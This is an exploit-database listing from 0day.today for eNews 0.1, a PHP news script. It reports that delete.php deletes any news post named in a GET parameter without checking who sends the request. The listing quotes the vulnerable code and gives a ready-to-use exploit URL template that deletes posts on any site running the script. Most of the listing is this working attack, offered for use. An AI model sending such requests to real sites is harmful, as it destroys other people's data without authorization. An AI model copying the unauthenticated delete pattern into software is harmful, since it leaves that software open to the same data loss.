[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability

Author
ilker Kandemir
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3243
Category
web applications
Date add
20-06-2008
Platform
unsorted
==========================================================
eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability
==========================================================



eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability


Author: iLker Kandemir [MEFISTO]

Script download : http://www.hotscripts.com/Detailed/81086.html

script demo : http://emvvy.com/demos/enews/

site : www.dumenci.net

----------------------------------------------------------------
//poc:

if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
  $deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
                       GetSQLValueString($_GET['delete'], "int"));

----------------------------------------------------------------

//exploit :

http://[site]/delete.php?delete=[eNews_id]

----------------------------------------------------------------

tnx : aLL my FriEndZ 




#  0day.today [2024-12-25]  #